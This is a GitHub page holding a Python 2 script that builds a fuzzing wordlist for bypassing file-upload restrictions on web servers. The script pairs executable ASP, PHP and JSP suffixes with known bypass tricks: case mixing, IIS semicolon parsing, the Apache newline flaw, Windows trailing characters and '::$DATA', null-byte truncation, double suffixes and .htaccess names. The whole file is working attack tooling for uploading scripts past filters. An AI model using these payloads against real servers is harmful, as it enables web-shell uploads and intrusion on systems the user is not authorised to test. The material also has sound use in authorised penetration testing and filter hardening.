-
Notifications
You must be signed in to change notification settings - Fork 259
/
Copy pathupload-fuzz-dic-builder.py
296 lines (253 loc) · 9.23 KB
/
upload-fuzz-dic-builder.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
#coding=utf-8
'''
author: c0ny1<root@gv7.me>
github: https://github.com/c0ny1/upload-fuzz-dic-builder
date: 2018-11-04 23:16
description: 生成符合漏洞实际场景fuzz字典的脚本
'''
import argparse
import copy
import urllib
## 各类语言可解析的后缀
html_parse_suffix = ['html','htm','phtml','pht','Html','Htm','pHtml']
asp_parse_suffix = ['asp','aspx','asa','asax','ascx','ashx','asmx','cer','aSp','aSpx','aSa','aSax','aScx','aShx','aSmx','cEr']
php_parse_suffix = ['php','php5','php4','php3','php2','pHp','pHp5','pHp4','pHp3','pHp2']
jsp_parse_suffix = ['jsp','jspa','jspx','jsw','jsv','jspf','jtml','jSp','jSpx','jSpa','jSw','jSv','jSpf','jHtml']
## web中间件解析漏洞
def iis_suffix_creater(suffix):
res = []
for l in suffix:
str ='%s;.%s' % (l,allow_suffix)
res.append(str)
return res
def apache_suffix_creater(suffix):
res = []
for l in suffix:
str = '%s.xxx' % l
res.append(str)
str = '%s%s' % (l,urllib.unquote('%0a')) #CVE-2017-15715
res.append(str)
return res
win_tomcat = ['%20','::$DATA','/']
def tomcat_suffix_creater(suffix):
res = []
for l in suffix:
for t in win_tomcat:
str = '%s%s' % (l,t)
res.append(str)
return res
## 系统特性
def str_81_to_ff():
res = []
for i in range(129,256):
str = '%x' % i
str = '%' + str
str = urllib.unquote(str)
res.append(str)
return res
windows_os = [' ','.','/','::$DATA','<','>','>>>','%20','%00'] + str_81_to_ff()
def windows_suffix_creater(suffix):
res = []
for s in suffix:
for w in windows_os:
str = '%s%s' % (s,w)
res.append(str)
return res
## 脚本语言漏洞(00截断)
def str_00_truncation(suffix,allow_suffix):
res = []
for i in suffix:
str = '%s%s.%s' % (i,'%00',allow_suffix)
res.append(str)
str = '%s%s.%s' % (i,urllib.unquote('%00'),allow_suffix)
res.append(str)
return res
## 返回字符串所有大写可能
def str_case_mixing(word):
str_list = []
word = word.lower()
tempWord = copy.deepcopy(word)
plist = []
redict = {}
for char in range( len( tempWord ) ):
char = word[char]
plist.append(char)
num = len( plist )
for i in range( num ):
for j in range( i , num + 1 ):
sContent = ''.join( plist[0:i] )
mContent = ''.join( plist[i:j] )
mContent = mContent.upper()
eContent = ''.join( plist[j:] )
content = '''%s%s%s''' % (sContent,mContent,eContent)
redict[content] = None
for i in redict.keys():
str_list.append(i)
return str_list
## list大小写混合
def list_case_mixing(li):
res = []
for l in li:
res += str_case_mixing(l)
return res
## 双后缀生成
def str_double_suffix_creater(suffix):
res = []
for i in range(1,len(suffix)):
str = list(suffix)
str.insert(i,suffix)
res.append("".join(str))
return res
def list_double_suffix_creater(list_suffix):
res = []
for l in list_suffix:
res += str_double_suffix_creater(l)
return duplicate_removal(res)
#list 去重
def duplicate_removal(li):
return list(set(li))
#list 去空行
def clear_list(li):
rmstr = ['',' ',None]
for l in li:
for r in rmstr:
if l == r:
li.remove(r)
return li
def parse_args():
parser = argparse.ArgumentParser(prog='upload-fuzz-dic-builder',
formatter_class=argparse.RawTextHelpFormatter,
description='')
parser.add_argument('-n','--upload-filename',metavar='',dest='upload_file_name', type=str, default='test',
help=u'Upload file name')
parser.add_argument('-a','--allow-suffix',metavar='',dest='allow_suffix', type=str, default='jpg',
help=u'Allowable upload suffix')
parser.add_argument('-l','--language',metavar='',dest='language',choices=['asp','php','jsp','all'], type=str, default='all',
help='Uploaded script language')
parser.add_argument('-m','--middleware',metavar='',dest='middleware',choices=['iis','apache','tomcat','all'],type=str, default='all',
help='Middleware used in Web System')
parser.add_argument('--os',metavar='',dest='os', choices=['win','linux','all'],type=str, default='all',
help='Target operating system type')
parser.add_argument('-d','--double-suffix',dest='double_suffix', default=False,action='store_true',
help='Is it possible to generate double suffix?')
parser.add_argument('-o','--output',metavar='',dest='output_filename', type=str, default='upload_fuzz_dic.txt',
help='Output file')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
upload_file_name = args.upload_file_name
allow_suffix = args.allow_suffix
output_filename =args.output_filename
language = args.language
middleware = args.middleware
os = args.os
double_suffix =args.double_suffix
if middleware == 'iis':
os = 'win'
###################################
f = open(output_filename,'w')
parse_suffix = []
case_parse_suffix = []
middleware_parse_suffix = []
htaccess_suffix = []
os_parse_suffix = []
double_parse_suffix = []
# 可解析后缀
if language == 'asp':
html_parse_suffix = []
php_parse_suffix = []
jsp_parse_suffix = []
parse_suffix = asp_parse_suffix
elif language == 'php':
asp_parse_suffix = []
jsp_parse_suffix = []
parse_suffix = html_parse_suffix + php_parse_suffix
elif language == 'jsp':
html_parse_suffix = []
asp_parse_suffix = []
php_parse_suffix = []
parse_suffix = jsp_parse_suffix
else: # language == 'all'
parse_suffix = html_parse_suffix + asp_parse_suffix + php_parse_suffix + jsp_parse_suffix
print u'[+] 收集%d条可解析后缀完毕!' % len(parse_suffix)
# 可解析后缀 + 大小写混合
if os == 'win' or os == 'all':
case_html_parse_suffix = list_case_mixing(html_parse_suffix)
case_asp_parse_suffix = list_case_mixing(asp_parse_suffix)
case_php_parse_suffix = list_case_mixing(php_parse_suffix)
case_jsp_parse_suffix = list_case_mixing(jsp_parse_suffix)
case_parse_suffix = list_case_mixing(parse_suffix)
print u'[+] 加入%d条可解析后缀大小写混合完毕!' % len(case_parse_suffix)
else: # os == 'linux'
case_html_parse_suffix = html_parse_suffix
case_asp_parse_suffix = asp_parse_suffix
case_php_parse_suffix = php_parse_suffix
case_jsp_parse_suffix = jsp_parse_suffix
case_parse_suffix = parse_suffix
# 中间件漏洞
if middleware == 'iis':
case_asp_php_jsp_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_jsp_parse_suffix
middleware_parse_suffix = iis_suffix_creater(case_asp_php_jsp_parse_suffix)
elif middleware == 'apache':
case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
middleware_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
elif middleware == 'tomcat' and os == 'linux':
middleware_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
elif middleware == 'tomcat' and (os == 'win' or os == 'all'):
case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
middleware_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
else:
case_asp_php_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix
iis_parse_suffix = iis_suffix_creater(case_asp_php_parse_suffix)
case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
apache_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
tomcat_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
middleware_parse_suffix = iis_parse_suffix + apache_parse_suffix + tomcat_parse_suffix
middleware_parse_suffix = duplicate_removal(middleware_parse_suffix)
print u'[+] 加入%d条中间件漏洞完毕!' % len(middleware_parse_suffix)
# .htaccess
if (middleware == 'apache' or middleware == 'all') and (os == 'win' or os == 'all'):
htaccess_suffix = str_case_mixing(".htaccess")
print u'[+] 加入%d条.htaccess完毕!' % len(htaccess_suffix)
elif (middleware == 'apache' or middleware == 'all') and os == 'linux':
htaccess_suffix = ['.htaccess']
print u'[+] 加入1条.htaccess'
else:
htaccess_suffix = []
# 系统特性
if os == 'win':
os_parse_suffix = windows_suffix_creater(case_parse_suffix)
elif os == 'linux':
os_parse_suffix = parse_suffix
else:
win_suffix = windows_suffix_creater(case_parse_suffix)
linux_suffix = parse_suffix
os_parse_suffix = win_suffix + linux_suffix
os_parse_suffix = duplicate_removal(os_parse_suffix)
print u'[+] 加入%d条系统特性完毕!' % len(os_parse_suffix)
# 语言漏洞
language_parse_suffux = str_00_truncation(case_parse_suffix,allow_suffix)
# 双后缀 + 大小写混合
if double_suffix:
double_parse_suffix = list_double_suffix_creater(case_parse_suffix)
print u'[+] 加入%d条双后缀完毕!' % len(double_parse_suffix)
else:
double_parse_suffix = []
all_parse_suffix = case_parse_suffix + middleware_parse_suffix + os_parse_suffix + language_parse_suffux + double_parse_suffix
all_parse_suffix = duplicate_removal(all_parse_suffix)
all_parse_suffix = clear_list(all_parse_suffix)
# 写文件
num = len(all_parse_suffix)
for i in all_parse_suffix:
str = '%s.%s' % (upload_file_name,i)
#print '[+] '+type(str)
f.write(str)
f.write('\n')
num += len(htaccess_suffix)
for i in htaccess_suffix:
f.write(i)
f.write('\n')
f.close()
print u'[+] 去重后共%s条数据写入%s文件' % (num,output_filename)